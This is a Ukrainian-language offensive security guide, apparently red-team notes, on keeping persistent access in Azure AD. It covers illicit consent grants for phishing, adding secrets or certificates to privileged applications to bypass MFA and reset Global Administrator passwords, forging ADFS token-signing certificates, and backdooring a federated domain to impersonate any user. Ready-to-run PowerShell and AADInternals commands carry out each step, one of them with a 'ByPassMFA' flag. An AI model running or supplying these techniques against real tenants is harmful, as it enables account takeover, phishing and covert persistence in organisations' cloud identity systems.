Незаконне надання згоди

За замовчуванням будь-який користувач може зареєструвати додаток в Azure AD. Таким чином, ви можете зареєструвати додаток (лише для цільового орендаря), який потребує високих дозволів з адміністративною згодою (затвердити його, якщо ви є адміністратором) - наприклад, відправка листів від імені користувача, управління ролями тощо. Це дозволить нам здійснювати атаки фішингу, які були б дуже плідними у разі успіху.

Крім того, ви також можете прийняти цей додаток з вашим користувачем як спосіб збереження доступу до нього.

Додатки та Службові облікові записи

З привілеями Адміністратора додатків, GA або власної ролі з дозволами microsoft.directory/applications/credentials/update, ми можемо додати облікові дані (секрет або сертифікат) до існуючого додатка.

Можливо націлити додаток з високими дозволами або додати новий додаток з високими дозволами.

Цікавою роллю для додавання до додатка буде Роль адміністратора привілейованої аутентифікації, оскільки вона дозволяє сбросити пароль Глобальних адміністраторів.

Ця техніка також дозволяє обійти MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Для аутентифікації на основі сертифікатів

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Федерація - Сертифікат підпису токена

З привілеями DA на локальному AD можливо створити та імпортувати нові сертифікати підпису токена та розшифрування токена, які мають дуже довгий термін дії. Це дозволить нам увійти як будь-який користувач, чий ImuutableID нам відомий.

Виконайте наведену нижче команду як DA на серверах ADFS, щоб створити нові сертифікати (за замовчуванням пароль 'AADInternals'), додайте їх до ADFS, вимкніть автоматичне оновлення та перезапустіть службу:

New-AADIntADFSSelfSignedCertificates

Потім оновіть інформацію про сертифікати з Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Федерація - Довірений домен

З правами GA на орендаря, можливо додати новий домен (його необхідно підтвердити), налаштувати його тип аутентифікації на Федеративний та налаштувати домен для довіри до певного сертифіката (any.sts у команді нижче) та випускача:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Посилання

• https://aadinternalsbackdoor.azurewebsites.net/